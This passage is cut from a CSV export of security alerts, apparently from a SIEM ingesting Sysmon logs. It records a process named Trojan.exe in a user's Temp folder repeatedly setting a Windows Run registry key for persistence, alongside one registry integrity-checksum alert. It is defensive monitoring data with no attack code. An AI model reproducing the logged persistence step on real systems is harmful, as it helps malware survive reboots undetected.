set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:55.387\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:55.387"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:25:58.548",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:54.356 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:54.358535800Z"",""eventRecordID"":""1865"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:54.356\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:54.356"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:57.142",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:53.340 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:53.341294700Z"",""eventRecordID"":""1863"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:53.340\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:53.340"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:55.736",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:52.324 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:52.329449100Z"",""eventRecordID"":""1861"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:52.324\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:52.324"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:25:54.954",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:51.293 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:51.294972000Z"",""eventRecordID"":""1860"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:51.293\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:51.293"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:53.751",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:50.277 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:50.281203800Z"",""eventRecordID"":""1858"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:50.277\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:50.277"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:52.678",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:49.246 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:49.251246800Z"",""eventRecordID"":""1857"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:49.246\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:49.246"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:25:52.220",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:48.230 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:48.231825600Z"",""eventRecordID"":""1856"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:48.230\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:48.230"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:51.564",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:47.215 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:47.227346500Z"",""eventRecordID"":""1855"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:47.215\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:47.215"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:51.518",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:46.199 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:46.201756000Z"",""eventRecordID"":""1854"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:46.199\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:46.199"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:25:49.177",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:45.168 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:45.170480200Z"",""eventRecordID"":""1853"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:45.168\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:45.168"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:48.376",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Capabilities' checksum changed. +Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e' +New md5sum is : '031a2ac02f3ad0395ebc66e870d3f7a1' +Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +New sha1sum is : '02327737fea3871d2b8ede52654439d116f38683' +", +"May 24, 2020 @ 16:25:47.892",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:44.152 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 